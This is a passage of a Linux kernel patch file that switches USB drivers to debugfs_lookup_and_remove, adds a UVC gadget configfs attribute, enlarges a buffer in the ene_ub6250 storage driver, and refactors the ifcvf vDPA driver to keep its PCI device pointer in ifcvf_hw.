+-		debugfs_remove(root);
++		debugfs_remove(ulpi_root);
+ 	return ret;
+ }
+ subsys_initcall(ulpi_init);
+@@ -373,7 +371,7 @@ subsys_initcall(ulpi_init);
+ static void __exit ulpi_exit(void)
+ {
+ 	bus_unregister(&ulpi_bus);
+-	debugfs_remove_recursive(ULPI_ROOT);
++	debugfs_remove(ulpi_root);
+ }
+ module_exit(ulpi_exit);
+ 
+diff --git a/drivers/usb/core/usb.c b/drivers/usb/core/usb.c
+index 11b15d7b357ad..a415206cab043 100644
+--- a/drivers/usb/core/usb.c
++++ b/drivers/usb/core/usb.c
+@@ -998,7 +998,7 @@ static void usb_debugfs_init(void)
+ 
+ static void usb_debugfs_cleanup(void)
+ {
+-	debugfs_remove(debugfs_lookup("devices", usb_debug_root));
++	debugfs_lookup_and_remove("devices", usb_debug_root);
+ }
+ 
+ /*
+diff --git a/drivers/usb/dwc3/core.h b/drivers/usb/dwc3/core.h
+index 8f9959ba9fd46..582ebd9cf9c2e 100644
+--- a/drivers/usb/dwc3/core.h
++++ b/drivers/usb/dwc3/core.h
+@@ -1117,6 +1117,7 @@ struct dwc3_scratchpad_array {
+  *		     address.
+  * @num_ep_resized: carries the current number endpoints which have had its tx
+  *		    fifo resized.
++ * @debug_root: root debugfs directory for this device to put its files in.
+  */
+ struct dwc3 {
+ 	struct work_struct	drd_work;
+@@ -1332,6 +1333,7 @@ struct dwc3 {
+ 	int			max_cfg_eps;
+ 	int			last_fifo_depth;
+ 	int			num_ep_resized;
++	struct dentry		*debug_root;
+ };
+ 
+ #define INCRX_BURST_MODE 0
+diff --git a/drivers/usb/dwc3/debug.h b/drivers/usb/dwc3/debug.h
+index 48b44b88dc252..8bb2c9e3b9ac6 100644
+--- a/drivers/usb/dwc3/debug.h
++++ b/drivers/usb/dwc3/debug.h
+@@ -414,11 +414,14 @@ static inline const char *dwc3_gadget_generic_cmd_status_string(int status)
+ 
+ #ifdef CONFIG_DEBUG_FS
+ extern void dwc3_debugfs_create_endpoint_dir(struct dwc3_ep *dep);
++extern void dwc3_debugfs_remove_endpoint_dir(struct dwc3_ep *dep);
+ extern void dwc3_debugfs_init(struct dwc3 *d);
+ extern void dwc3_debugfs_exit(struct dwc3 *d);
+ #else
+ static inline void dwc3_debugfs_create_endpoint_dir(struct dwc3_ep *dep)
+ {  }
++static inline void dwc3_debugfs_remove_endpoint_dir(struct dwc3_ep *dep)
++{  }
+ static inline void dwc3_debugfs_init(struct dwc3 *d)
+ {  }
+ static inline void dwc3_debugfs_exit(struct dwc3 *d)
+diff --git a/drivers/usb/dwc3/debugfs.c b/drivers/usb/dwc3/debugfs.c
+index f2b7675c7f621..850df0e6bcabf 100644
+--- a/drivers/usb/dwc3/debugfs.c
++++ b/drivers/usb/dwc3/debugfs.c
+@@ -873,27 +873,23 @@ static const struct dwc3_ep_file_map dwc3_ep_file_map[] = {
+ 	{ "GDBGEPINFO", &dwc3_ep_info_register_fops, },
+ };
+ 
+-static void dwc3_debugfs_create_endpoint_files(struct dwc3_ep *dep,
+-		struct dentry *parent)
++void dwc3_debugfs_create_endpoint_dir(struct dwc3_ep *dep)
+ {
++	struct dentry		*dir;
+ 	int			i;
+ 
++	dir = debugfs_create_dir(dep->name, dep->dwc->debug_root);
+ 	for (i = 0; i < ARRAY_SIZE(dwc3_ep_file_map); i++) {
+ 		const struct file_operations *fops = dwc3_ep_file_map[i].fops;
+ 		const char *name = dwc3_ep_file_map[i].name;
+ 
+-		debugfs_create_file(name, 0444, parent, dep, fops);
++		debugfs_create_file(name, 0444, dir, dep, fops);
+ 	}
+ }
+ 
+-void dwc3_debugfs_create_endpoint_dir(struct dwc3_ep *dep)
++void dwc3_debugfs_remove_endpoint_dir(struct dwc3_ep *dep)
+ {
+-	struct dentry		*dir;
+-	struct dentry		*root;
+-
+-	root = debugfs_lookup(dev_name(dep->dwc->dev), usb_debug_root);
+-	dir = debugfs_create_dir(dep->name, root);
+-	dwc3_debugfs_create_endpoint_files(dep, dir);
++	debugfs_lookup_and_remove(dep->name, dep->dwc->debug_root);
+ }
+ 
+ void dwc3_debugfs_init(struct dwc3 *dwc)
+@@ -911,6 +907,7 @@ void dwc3_debugfs_init(struct dwc3 *dwc)
+ 	dwc->regset->base = dwc->regs - DWC3_GLOBALS_REGS_START;
+ 
+ 	root = debugfs_create_dir(dev_name(dwc->dev), usb_debug_root);
++	dwc->debug_root = root;
+ 	debugfs_create_regset32("regdump", 0444, root, dwc->regset);
+ 	debugfs_create_file("lsp_dump", 0644, root, dwc, &dwc3_lsp_fops);
+ 
+@@ -929,6 +926,6 @@ void dwc3_debugfs_init(struct dwc3 *dwc)
+ 
+ void dwc3_debugfs_exit(struct dwc3 *dwc)
+ {
+-	debugfs_remove(debugfs_lookup(dev_name(dwc->dev), usb_debug_root));
++	debugfs_lookup_and_remove(dev_name(dwc->dev), usb_debug_root);
+ 	kfree(dwc->regset);
+ }
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index ed958da0e1c96..df1ce96fa2281 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -3184,9 +3184,7 @@ static void dwc3_gadget_free_endpoints(struct dwc3 *dwc)
+ 			list_del(&dep->endpoint.ep_list);
+ 		}
+ 
+-		debugfs_remove_recursive(debugfs_lookup(dep->name,
+-				debugfs_lookup(dev_name(dep->dwc->dev),
+-					       usb_debug_root)));
++		dwc3_debugfs_remove_endpoint_dir(dep);
+ 		kfree(dep);
+ 	}
+ }
+diff --git a/drivers/usb/gadget/function/uvc_configfs.c b/drivers/usb/gadget/function/uvc_configfs.c
+index 4303a3283ba0a..015a7bbd9bbfe 100644
+--- a/drivers/usb/gadget/function/uvc_configfs.c
++++ b/drivers/usb/gadget/function/uvc_configfs.c
+@@ -483,11 +483,68 @@ UVC_ATTR_RO(uvcg_default_output_, cname, aname)
+ UVCG_DEFAULT_OUTPUT_ATTR(b_terminal_id, bTerminalID, 8);
+ UVCG_DEFAULT_OUTPUT_ATTR(w_terminal_type, wTerminalType, 16);
+ UVCG_DEFAULT_OUTPUT_ATTR(b_assoc_terminal, bAssocTerminal, 8);
+-UVCG_DEFAULT_OUTPUT_ATTR(b_source_id, bSourceID, 8);
+ UVCG_DEFAULT_OUTPUT_ATTR(i_terminal, iTerminal, 8);
+ 
+ #undef UVCG_DEFAULT_OUTPUT_ATTR
+ 
++static ssize_t uvcg_default_output_b_source_id_show(struct config_item *item,
++						    char *page)
++{
++	struct config_group *group = to_config_group(item);
++	struct f_uvc_opts *opts;
++	struct config_item *opts_item;
++	struct mutex *su_mutex = &group->cg_subsys->su_mutex;
++	struct uvc_output_terminal_descriptor *cd;
++	int result;
++
++	mutex_lock(su_mutex); /* for navigating configfs hierarchy */
++
++	opts_item = group->cg_item.ci_parent->ci_parent->
++			ci_parent->ci_parent;
++	opts = to_f_uvc_opts(opts_item);
++	cd = &opts->uvc_output_terminal;
++
++	mutex_lock(&opts->lock);
++	result = sprintf(page, "%u\n", le8_to_cpu(cd->bSourceID));
++	mutex_unlock(&opts->lock);
++
++	mutex_unlock(su_mutex);
++
++	return result;
++}
++
++static ssize_t uvcg_default_output_b_source_id_store(struct config_item *item,
++						     const char *page, size_t len)
++{
++	struct config_group *group = to_config_group(item);
++	struct f_uvc_opts *opts;
++	struct config_item *opts_item;
++	struct mutex *su_mutex = &group->cg_subsys->su_mutex;
++	struct uvc_output_terminal_descriptor *cd;
++	int result;
++	u8 num;
++
++	result = kstrtou8(page, 0, &num);
++	if (result)
++		return result;
++
++	mutex_lock(su_mutex); /* for navigating configfs hierarchy */
++
++	opts_item = group->cg_item.ci_parent->ci_parent->
++			ci_parent->ci_parent;
++	opts = to_f_uvc_opts(opts_item);
++	cd = &opts->uvc_output_terminal;
++
++	mutex_lock(&opts->lock);
++	cd->bSourceID = num;
++	mutex_unlock(&opts->lock);
++
++	mutex_unlock(su_mutex);
++
++	return len;
++}
++UVC_ATTR(uvcg_default_output_, b_source_id, bSourceID);
++
+ static struct configfs_attribute *uvcg_default_output_attrs[] = {
+ 	&uvcg_default_output_attr_b_terminal_id,
+ 	&uvcg_default_output_attr_w_terminal_type,
+diff --git a/drivers/usb/gadget/udc/bcm63xx_udc.c b/drivers/usb/gadget/udc/bcm63xx_udc.c
+index d04d72f5816e6..8d58928913007 100644
+--- a/drivers/usb/gadget/udc/bcm63xx_udc.c
++++ b/drivers/usb/gadget/udc/bcm63xx_udc.c
+@@ -2258,7 +2258,7 @@ static void bcm63xx_udc_init_debugfs(struct bcm63xx_udc *udc)
+  */
+ static void bcm63xx_udc_cleanup_debugfs(struct bcm63xx_udc *udc)
+ {
+-	debugfs_remove(debugfs_lookup(udc->gadget.name, usb_debug_root));
++	debugfs_lookup_and_remove(udc->gadget.name, usb_debug_root);
+ }
+ 
+ /***********************************************************************
+diff --git a/drivers/usb/gadget/udc/gr_udc.c b/drivers/usb/gadget/udc/gr_udc.c
+index 85cdc0af3bf95..09762559912d3 100644
+--- a/drivers/usb/gadget/udc/gr_udc.c
++++ b/drivers/usb/gadget/udc/gr_udc.c
+@@ -215,7 +215,7 @@ static void gr_dfs_create(struct gr_udc *dev)
+ 
+ static void gr_dfs_delete(struct gr_udc *dev)
+ {
+-	debugfs_remove(debugfs_lookup(dev_name(dev->dev), usb_debug_root));
++	debugfs_lookup_and_remove(dev_name(dev->dev), usb_debug_root);
+ }
+ 
+ #else /* !CONFIG_USB_GADGET_DEBUG_FS */
+diff --git a/drivers/usb/gadget/udc/lpc32xx_udc.c b/drivers/usb/gadget/udc/lpc32xx_udc.c
+index cea10cdb83ae5..fe62db32dd0eb 100644
+--- a/drivers/usb/gadget/udc/lpc32xx_udc.c
++++ b/drivers/usb/gadget/udc/lpc32xx_udc.c
+@@ -532,7 +532,7 @@ static void create_debug_file(struct lpc32xx_udc *udc)
+ 
+ static void remove_debug_file(struct lpc32xx_udc *udc)
+ {
+-	debugfs_remove(debugfs_lookup(debug_filename, NULL));
++	debugfs_lookup_and_remove(debug_filename, NULL);
+ }
+ 
+ #else
+diff --git a/drivers/usb/gadget/udc/pxa25x_udc.c b/drivers/usb/gadget/udc/pxa25x_udc.c
+index c593fc383481e..9e01ddf2b4170 100644
+--- a/drivers/usb/gadget/udc/pxa25x_udc.c
++++ b/drivers/usb/gadget/udc/pxa25x_udc.c
+@@ -1340,7 +1340,7 @@ DEFINE_SHOW_ATTRIBUTE(udc_debug);
+ 		debugfs_create_file(dev->gadget.name, \
+ 			S_IRUGO, NULL, dev, &udc_debug_fops); \
+ 	} while (0)
+-#define remove_debug_files(dev) debugfs_remove(debugfs_lookup(dev->gadget.name, NULL))
++#define remove_debug_files(dev) debugfs_lookup_and_remove(dev->gadget.name, NULL)
+ 
+ #else	/* !CONFIG_USB_GADGET_DEBUG_FILES */
+ 
+diff --git a/drivers/usb/gadget/udc/pxa27x_udc.c b/drivers/usb/gadget/udc/pxa27x_udc.c
+index ac980d6a47406..0ecdfd2ba9e9b 100644
+--- a/drivers/usb/gadget/udc/pxa27x_udc.c
++++ b/drivers/usb/gadget/udc/pxa27x_udc.c
+@@ -215,7 +215,7 @@ static void pxa_init_debugfs(struct pxa_udc *udc)
+ 
+ static void pxa_cleanup_debugfs(struct pxa_udc *udc)
+ {
+-	debugfs_remove(debugfs_lookup(udc->gadget.name, usb_debug_root));
++	debugfs_lookup_and_remove(udc->gadget.name, usb_debug_root);
+ }
+ 
+ #else
+diff --git a/drivers/usb/host/fotg210-hcd.c b/drivers/usb/host/fotg210-hcd.c
+index 3d1dbcf4c0732..c4c1fbc12b4cd 100644
+--- a/drivers/usb/host/fotg210-hcd.c
++++ b/drivers/usb/host/fotg210-hcd.c
+@@ -862,7 +862,7 @@ static inline void remove_debug_files(struct fotg210_hcd *fotg210)
+ {
+ 	struct usb_bus *bus = &fotg210_to_hcd(fotg210)->self;
+ 
+-	debugfs_remove(debugfs_lookup(bus->bus_name, fotg210_debug_root));
++	debugfs_lookup_and_remove(bus->bus_name, fotg210_debug_root);
+ }
+ 
+ /* handshake - spin reading hc until handshake completes or fails
+diff --git a/drivers/usb/host/isp116x-hcd.c b/drivers/usb/host/isp116x-hcd.c
+index 4f564d71bb0bc..49ae01487af4d 100644
+--- a/drivers/usb/host/isp116x-hcd.c
++++ b/drivers/usb/host/isp116x-hcd.c
+@@ -1205,7 +1205,7 @@ static void create_debug_file(struct isp116x *isp116x)
+ 
+ static void remove_debug_file(struct isp116x *isp116x)
+ {
+-	debugfs_remove(debugfs_lookup(hcd_name, usb_debug_root));
++	debugfs_lookup_and_remove(hcd_name, usb_debug_root);
+ }
+ 
+ #else
+diff --git a/drivers/usb/host/isp1362-hcd.c b/drivers/usb/host/isp1362-hcd.c
+index 0e14d1d07709d..b0da143ef4be9 100644
+--- a/drivers/usb/host/isp1362-hcd.c
++++ b/drivers/usb/host/isp1362-hcd.c
+@@ -2170,7 +2170,7 @@ static void create_debug_file(struct isp1362_hcd *isp1362_hcd)
+ 
+ static void remove_debug_file(struct isp1362_hcd *isp1362_hcd)
+ {
+-	debugfs_remove(debugfs_lookup("isp1362", usb_debug_root));
++	debugfs_lookup_and_remove("isp1362", usb_debug_root);
+ }
+ 
+ /*-------------------------------------------------------------------------*/
+diff --git a/drivers/usb/host/sl811-hcd.c b/drivers/usb/host/sl811-hcd.c
+index d206bd95c7bbc..b8b90eec91078 100644
+--- a/drivers/usb/host/sl811-hcd.c
++++ b/drivers/usb/host/sl811-hcd.c
+@@ -1501,7 +1501,7 @@ static void create_debug_file(struct sl811 *sl811)
+ 
+ static void remove_debug_file(struct sl811 *sl811)
+ {
+-	debugfs_remove(debugfs_lookup("sl811h", usb_debug_root));
++	debugfs_lookup_and_remove("sl811h", usb_debug_root);
+ }
+ 
+ /*-------------------------------------------------------------------------*/
+diff --git a/drivers/usb/host/uhci-hcd.c b/drivers/usb/host/uhci-hcd.c
+index c22b51af83fcb..7cdc2fa7c28fb 100644
+--- a/drivers/usb/host/uhci-hcd.c
++++ b/drivers/usb/host/uhci-hcd.c
+@@ -536,8 +536,8 @@ static void release_uhci(struct uhci_hcd *uhci)
+ 	uhci->is_initialized = 0;
+ 	spin_unlock_irq(&uhci->lock);
+ 
+-	debugfs_remove(debugfs_lookup(uhci_to_hcd(uhci)->self.bus_name,
+-				      uhci_debugfs_root));
++	debugfs_lookup_and_remove(uhci_to_hcd(uhci)->self.bus_name,
++				  uhci_debugfs_root);
+ 
+ 	for (i = 0; i < UHCI_NUM_SKELQH; i++)
+ 		uhci_free_qh(uhci, uhci->skelqh[i]);
+@@ -700,7 +700,7 @@ err_alloc_frame_cpu:
+ 			uhci->frame, uhci->frame_dma_handle);
+ 
+ err_alloc_frame:
+-	debugfs_remove(debugfs_lookup(hcd->self.bus_name, uhci_debugfs_root));
++	debugfs_lookup_and_remove(hcd->self.bus_name, uhci_debugfs_root);
+ 
+ 	return retval;
+ }
+diff --git a/drivers/usb/host/xhci-mvebu.c b/drivers/usb/host/xhci-mvebu.c
+index 60651a50770f9..87f1597a0e5ab 100644
+--- a/drivers/usb/host/xhci-mvebu.c
++++ b/drivers/usb/host/xhci-mvebu.c
+@@ -32,7 +32,7 @@ static void xhci_mvebu_mbus_config(void __iomem *base,
+ 
+ 	/* Program each DRAM CS in a seperate window */
+ 	for (win = 0; win < dram->num_cs; win++) {
+-		const struct mbus_dram_window *cs = dram->cs + win;
++		const struct mbus_dram_window *cs = &dram->cs[win];
+ 
+ 		writel(((cs->size - 1) & 0xffff0000) | (cs->mbus_attr << 8) |
+ 		       (dram->mbus_dram_target_id << 4) | 1,
+diff --git a/drivers/usb/storage/ene_ub6250.c b/drivers/usb/storage/ene_ub6250.c
+index 6012603f3630e..97c66c0d91f4d 100644
+--- a/drivers/usb/storage/ene_ub6250.c
++++ b/drivers/usb/storage/ene_ub6250.c
+@@ -939,7 +939,7 @@ static int ms_lib_process_bootblock(struct us_data *us, u16 PhyBlock, u8 *PageDa
+ 	struct ms_lib_type_extdat ExtraData;
+ 	struct ene_ub6250_info *info = (struct ene_ub6250_info *) us->extra;
+ 
+-	PageBuffer = kmalloc(MS_BYTES_PER_PAGE, GFP_KERNEL);
++	PageBuffer = kzalloc(MS_BYTES_PER_PAGE * 2, GFP_KERNEL);
+ 	if (PageBuffer == NULL)
+ 		return (u32)-1;
+ 
+diff --git a/drivers/vdpa/ifcvf/ifcvf_base.c b/drivers/vdpa/ifcvf/ifcvf_base.c
+index 3e4486bfa0b71..3ec5ca3aefe1d 100644
+--- a/drivers/vdpa/ifcvf/ifcvf_base.c
++++ b/drivers/vdpa/ifcvf/ifcvf_base.c
+@@ -10,11 +10,6 @@
+ 
+ #include "ifcvf_base.h"
+ 
+-struct ifcvf_adapter *vf_to_adapter(struct ifcvf_hw *hw)
+-{
+-	return container_of(hw, struct ifcvf_adapter, vf);
+-}
+-
+ u16 ifcvf_set_vq_vector(struct ifcvf_hw *hw, u16 qid, int vector)
+ {
+ 	struct virtio_pci_common_cfg __iomem *cfg = hw->common_cfg;
+@@ -37,8 +32,6 @@ u16 ifcvf_set_config_vector(struct ifcvf_hw *hw, int vector)
+ static void __iomem *get_cap_addr(struct ifcvf_hw *hw,
+ 				  struct virtio_pci_cap *cap)
+ {
+-	struct ifcvf_adapter *ifcvf;
+-	struct pci_dev *pdev;
+ 	u32 length, offset;
+ 	u8 bar;
+ 
+@@ -46,17 +39,14 @@ static void __iomem *get_cap_addr(struct ifcvf_hw *hw,
+ 	offset = le32_to_cpu(cap->offset);
+ 	bar = cap->bar;
+ 
+-	ifcvf= vf_to_adapter(hw);
+-	pdev = ifcvf->pdev;
+-
+ 	if (bar >= IFCVF_PCI_MAX_RESOURCE) {
+-		IFCVF_DBG(pdev,
++		IFCVF_DBG(hw->pdev,
+ 			  "Invalid bar number %u to get capabilities\n", bar);
+ 		return NULL;
+ 	}
+ 
+-	if (offset + length > pci_resource_len(pdev, bar)) {
+-		IFCVF_DBG(pdev,
++	if (offset + length > pci_resource_len(hw->pdev, bar)) {
++		IFCVF_DBG(hw->pdev,
+ 			  "offset(%u) + len(%u) overflows bar%u's capability\n",
+ 			  offset, length, bar);
+ 		return NULL;
+@@ -92,6 +82,7 @@ int ifcvf_init_hw(struct ifcvf_hw *hw, struct pci_dev *pdev)
+ 		IFCVF_ERR(pdev, "Failed to read PCI capability list\n");
+ 		return -EIO;
+ 	}
++	hw->pdev = pdev;
+ 
+ 	while (pos) {
+ 		ret = ifcvf_read_config_range(pdev, (u32 *)&cap,
+@@ -220,10 +211,8 @@ u64 ifcvf_get_features(struct ifcvf_hw *hw)
+ 
+ int ifcvf_verify_min_features(struct ifcvf_hw *hw, u64 features)
+ {
+-	struct ifcvf_adapter *ifcvf = vf_to_adapter(hw);
+-
+ 	if (!(features & BIT_ULL(VIRTIO_F_ACCESS_PLATFORM)) && features) {
+-		IFCVF_ERR(ifcvf->pdev, "VIRTIO_F_ACCESS_PLATFORM is not negotiated\n");
++		IFCVF_ERR(hw->pdev, "VIRTIO_F_ACCESS_PLATFORM is not negotiated\n");
+ 		return -EINVAL;
+ 	}
+ 
+@@ -232,13 +221,11 @@ int ifcvf_verify_min_features(struct ifcvf_hw *hw, u64 features)
+ 
+ u32 ifcvf_get_config_size(struct ifcvf_hw *hw)
+ {
+-	struct ifcvf_adapter *adapter;
+ 	u32 net_config_size = sizeof(struct virtio_net_config);
+ 	u32 blk_config_size = sizeof(struct virtio_blk_config);
+ 	u32 cap_size = hw->cap_dev_config_size;
+ 	u32 config_size;
+ 
+-	adapter = vf_to_adapter(hw);
+ 	/* If the onboard device config space size is greater than
+ 	 * the size of struct virtio_net/blk_config, only the spec
+ 	 * implementing contents size is returned, this is very
+@@ -253,7 +240,7 @@ u32 ifcvf_get_config_size(struct ifcvf_hw *hw)
+ 		break;
+ 	default:
+ 		config_size = 0;
+-		IFCVF_ERR(adapter->pdev, "VIRTIO ID %u not supported\n", hw->dev_type);
++		IFCVF_ERR(hw->pdev, "VIRTIO ID %u not supported\n", hw->dev_type);
+ 	}
+ 
+ 	return config_size;
+@@ -301,14 +288,11 @@ static void ifcvf_set_features(struct ifcvf_hw *hw, u64 features)
+ 
+ static int ifcvf_config_features(struct ifcvf_hw *hw)
+ {
+-	struct ifcvf_adapter *ifcvf;
+-
+-	ifcvf = vf_to_adapter(hw);
+ 	ifcvf_set_features(hw, hw->req_features);
+ 	ifcvf_add_status(hw, VIRTIO_CONFIG_S_FEATURES_OK);
+ 
+ 	if (!(ifcvf_get_status(hw) & VIRTIO_CONFIG_S_FEATURES_OK)) {
+-		IFCVF_ERR(ifcvf->pdev, "Failed to set FEATURES_OK status\n");
++		IFCVF_ERR(hw->pdev, "Failed to set FEATURES_OK status\n");
+ 		return -EIO;
+ 	}
+ 
+diff --git a/drivers/vdpa/ifcvf/ifcvf_base.h b/drivers/vdpa/ifcvf/ifcvf_base.h
+index f5563f665cc62..25bd4e927b274 100644
+--- a/drivers/vdpa/ifcvf/ifcvf_base.h
++++ b/drivers/vdpa/ifcvf/ifcvf_base.h
+@@ -39,7 +39,7 @@
+ #define IFCVF_INFO(pdev, fmt, ...)	dev_info(&pdev->dev, fmt, ##__VA_ARGS__)
+ 
+ #define ifcvf_private_to_vf(adapter) \
+-	(&((struct ifcvf_adapter *)adapter)->vf)
++	(((struct ifcvf_adapter *)adapter)->vf)
+ 
+ /* all vqs and config interrupt has its own vector */
+ #define MSIX_VECTOR_PER_VQ_AND_CONFIG		1
+@@ -89,12 +89,13 @@ struct ifcvf_hw {
+ 	u16 nr_vring;
+ 	/* VIRTIO_PCI_CAP_DEVICE_CFG size */
+ 	u32 cap_dev_config_size;
++	struct pci_dev *pdev;
+ };
+ 
+ struct ifcvf_adapter {
+ 	struct vdpa_device vdpa;
+ 	struct pci_dev *pdev;
+-	struct ifcvf_hw vf;
++	struct ifcvf_hw *vf;
+ };
+ 
+ struct ifcvf_vring_lm_cfg {
+@@ -109,6 +110,7 @@ struct ifcvf_lm_cfg {
+ 
+ struct ifcvf_vdpa_mgmt_dev {
+ 	struct vdpa_mgmt_dev mdev;
++	struct ifcvf_hw vf;
+ 	struct ifcvf_adapter *adapter;
+ 	struct pci_dev *pdev;
+ };
+diff --git a/drivers/vdpa/ifcvf/ifcvf_main.c b/drivers/vdpa/ifcvf/ifcvf_main.c
+index 44b29289aa193..d5036f49f161a 100644
+--- a/drivers/vdpa/ifcvf/ifcvf_main.c
++++ b/drivers/vdpa/ifcvf/ifcvf_main.c
+@@ -69,10 +69,9 @@ static void ifcvf_free_irq_vectors(void *data)
+ 	pci_free_irq_vectors(data);
+ }
+ 
+-static void ifcvf_free_per_vq_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_per_vq_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int i;
+ 
+ 	for (i = 0; i < vf->nr_vring; i++) {
+@@ -83,10 +82,9 @@ static void ifcvf_free_per_vq_irq(struct ifcvf_adapter *adapter)
+ 	}
+ }
+ 
+-static void ifcvf_free_vqs_reused_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_vqs_reused_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 
+ 	if (vf->vqs_reused_irq != -EINVAL) {
+ 		devm_free_irq(&pdev->dev, vf->vqs_reused_irq, vf);
+@@ -95,20 +93,17 @@ static void ifcvf_free_vqs_reused_irq(struct ifcvf_adapter *adapter)
+ 
+ }
+ 
+-static void ifcvf_free_vq_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_vq_irq(struct ifcvf_hw *vf)
+ {
+-	struct ifcvf_hw *vf = &adapter->vf;
+-
+ 	if (vf->msix_vector_status == MSIX_VECTOR_PER_VQ_AND_CONFIG)
+-		ifcvf_free_per_vq_irq(adapter);
++		ifcvf_free_per_vq_irq(vf);
+ 	else
+-		ifcvf_free_vqs_reused_irq(adapter);
++		ifcvf_free_vqs_reused_irq(vf);
+ }
+ 
+-static void ifcvf_free_config_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_config_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 
+ 	if (vf->config_irq == -EINVAL)
+ 		return;
+@@ -123,12 +118,12 @@ static void ifcvf_free_config_irq(struct ifcvf_adapter *adapter)
+ 	}
+ }
+ 
+-static void ifcvf_free_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
++	struct pci_dev *pdev = vf->pdev;
+ 
+-	ifcvf_free_vq_irq(adapter);
+-	ifcvf_free_config_irq(adapter);
++	ifcvf_free_vq_irq(vf);
++	ifcvf_free_config_irq(vf);
+ 	ifcvf_free_irq_vectors(pdev);
+ }
+ 
+@@ -137,10 +132,9 @@ static void ifcvf_free_irq(struct ifcvf_adapter *adapter)
+  * It returns the number of allocated vectors, negative
+  * return value when fails.
+  */
+-static int ifcvf_alloc_vectors(struct ifcvf_adapter *adapter)
++static int ifcvf_alloc_vectors(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int max_intr, ret;
+ 
+ 	/* all queues and config interrupt  */
+@@ -160,10 +154,9 @@ static int ifcvf_alloc_vectors(struct ifcvf_adapter *adapter)
+ 	return ret;
+ }
+ 
+-static int ifcvf_request_per_vq_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_per_vq_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int i, vector, ret, irq;
+ 
+ 	vf->vqs_reused_irq = -EINVAL;
+@@ -190,15 +183,14 @@ static int ifcvf_request_per_vq_irq(struct ifcvf_adapter *adapter)
+ 
+ 	return 0;
+ err:
+-	ifcvf_free_irq(adapter);
++	ifcvf_free_irq(vf);
+ 
+ 	return -EFAULT;
+ }
+ 
+-static int ifcvf_request_vqs_reused_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_vqs_reused_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int i, vector, ret, irq;
+ 
+ 	vector = 0;
+@@ -224,15 +216,14 @@ static int ifcvf_request_vqs_reused_irq(struct ifcvf_adapter *adapter)
+ 
+ 	return 0;
+ err:
+-	ifcvf_free_irq(adapter);
++	ifcvf_free_irq(vf);
+ 
+ 	return -EFAULT;
+ }
+ 
+-static int ifcvf_request_dev_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_dev_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int i, vector, ret, irq;
+ 
+ 	vector = 0;
+@@ -265,29 +256,27 @@ static int ifcvf_request_dev_irq(struct ifcvf_adapter *adapter)
+ 
+ 	return 0;
+ err:
+-	ifcvf_free_irq(adapter);
++	ifcvf_free_irq(vf);
+ 
+ 	return -EFAULT;
+ 
+ }
+ 
+-static int ifcvf_request_vq_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_vq_irq(struct ifcvf_hw *vf)
+ {
+-	struct ifcvf_hw *vf = &adapter->vf;
+ 	int ret;
+ 
+ 	if (vf->msix_vector_status == MSIX_VECTOR_PER_VQ_AND_CONFIG)
+-		ret = ifcvf_request_per_vq_irq(adapter);
++		ret = ifcvf_request_per_vq_irq(vf);
+ 	else
+-		ret = ifcvf_request_vqs_reused_irq(adapter);
++		ret = ifcvf_request_vqs_reused_irq(vf);
+ 
+ 	return ret;
+ }
+ 
+-static int ifcvf_request_config_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_config_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int config_vector, ret;
+ 
+ 	if (vf->msix_vector_status == MSIX_VECTOR_PER_VQ_AND_CONFIG)
+@@ -320,17 +309,16 @@ static int ifcvf_request_config_irq(struct ifcvf_adapter *adapter)
+ 
+ 	return 0;
+ err:
+-	ifcvf_free_irq(adapter);
++	ifcvf_free_irq(vf);
+ 
+ 	return -EFAULT;
+ }
+ 
+-static int ifcvf_request_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_irq(struct ifcvf_hw *vf)
+ {
+-	struct ifcvf_hw *vf = &adapter->vf;
+ 	int nvectors, ret, max_intr;
+ 
+-	nvectors = ifcvf_alloc_vectors(adapter);
++	nvectors = ifcvf_alloc_vectors(vf);
+ 	if (nvectors <= 0)
+ 		return -EFAULT;
+ 
+@@ -341,16 +329,16 @@ static int ifcvf_request_irq(struct ifcvf_adapter *adapter)
+ 
+ 	if (nvectors == 1) {
+ 		vf->msix_vector_status = MSIX_VECTOR_DEV_SHARED;
+-		ret = ifcvf_request_dev_irq(adapter);
++		ret = ifcvf_request_dev_irq(vf);
+ 
+ 		return ret;
+ 	}
+ 
+-	ret = ifcvf_request_vq_irq(adapter);
